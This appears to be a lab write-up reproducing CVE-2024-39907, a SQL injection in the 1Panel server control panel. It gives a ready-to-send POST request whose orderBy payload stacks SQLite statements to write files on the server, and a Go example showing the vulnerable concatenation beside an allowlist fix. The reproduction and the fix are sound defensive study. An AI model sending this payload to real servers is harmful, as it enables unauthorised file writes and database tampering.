CVE-2024-39907

CVE Details:

  • Published July 18, 2024
  • Severity CRITICAL
  • CNA Score 9.8

Description:

A critical SQL injection vulnerability (CVE-2024-39907) has been discovered in 1Panel, an open-source web-based Linux server management control panel. The vulnerability was disclosed on July 18, 2024, and carries a CVSS score of 9.8 (Critical). The flaw affects 1Panel versions from v1.10.9-lts up to (excluding) v1.10.12-lts.

Vulhub Source:

1panel/CVE-2024-39907/README.md

After the server starts, access http://127.0.0.1:10086/entrance using the following default credentials:

  • Username: 1panel
  • Password: 1panel_password

Vulnerability Reproduction:

After logging into the 1Panel control panel with the default credentials, the vulnerability exists in the /api/v1/hosts/command/search endpoint where the orderBy parameter lacks proper input validation, allowing SQL injection attacks.

Send the following malicious POST request to exploit the vulnerability:

POST /api/v1/hosts/command/search HTTP/1.1
Host: your-ip:10086
Accept-Language: zh
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Cookie: psession=your-session-cookie
Connection: close
Content-Type: application/json
Content-Length: 83

{
  "page":1,
  "pageSize":10,
  "groupID":0,
  "orderBy":"3;ATTACH DATABASE '/tmp/randstr.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);drop table test.exp;",
  "order":"ascending",
  "name":"a"
}

The malicious payload in the orderBy parameter exploits SQLite’s ATTACH DATABASE functionality to create arbitrary files on the server filesystem, demonstrating successful SQL injection. When processed, the 1Panel backend executes the injected SQL commands without validation, confirming the vulnerability exists and can be exploited.
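The root cause is a sort parameter spliced into the query text. As an added example, not code from 1Panel or from the Vulhub write-up, the snippet below contrasts that unsafe concatenation with an allowlist-based fix in Go (1Panel's language); the sortable column names are assumed for illustration and are not taken from 1Panel's schema.

```go
package main

import (
	"errors"
	"fmt"
	"regexp"
	"strings"
)

// Hypothetical allowlist of sortable columns for a search endpoint.
// Column names are assumed for illustration, not 1Panel's real schema.
var allowedOrderBy = map[string]string{
	"name":       "name",
	"created_at": "created_at",
	"group_id":   "group_id",
}

// A plain SQL identifier: no ';', quotes, whitespace or other statement glue.
var identRe = regexp.MustCompile(`^[A-Za-z_][A-Za-z0-9_]*$`)

// VulnerableOrderClause is the unsafe pattern behind CVE-2024-39907: the raw
// orderBy value is concatenated into the query, so a value containing ';'
// appends further statements (e.g. ATTACH DATABASE) to the query.
func VulnerableOrderClause(orderBy, order string) string {
	return "ORDER BY " + orderBy + " " + order
}

// BuildOrderClause is the hardened form: the user-supplied orderBy/order pair
// is mapped through an allowlist, and only fixed literals reach the SQL text.
func BuildOrderClause(orderBy, order string) (string, error) {
	if !identRe.MatchString(orderBy) {
		return "", errors.New("orderBy: not a plain identifier")
	}
	col, ok := allowedOrderBy[strings.ToLower(orderBy)]
	if !ok {
		return "", fmt.Errorf("orderBy: column %q is not sortable", orderBy)
	}
	var dir string
	switch order {
	case "ascending":
		dir = "ASC"
	case "descending":
		dir = "DESC"
	default:
		return "", fmt.Errorf("order: %q is not ascending/descending", order)
	}
	return fmt.Sprintf("ORDER BY %s %s", col, dir), nil
}

func main() {
	fmt.Println(BuildOrderClause("3;ATTACH DATABASE '/tmp/x' AS t;", "ascending"))
	fmt.Println(BuildOrderClause("name", "descending"))
}
```

The same allowlist approach applies to any column or direction parameter that ends up in an ORDER BY, since parameter binding cannot be used for identifiers.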

My approach:

Starting ZAP proxy to intercept the request and replaying it using the malicious payload.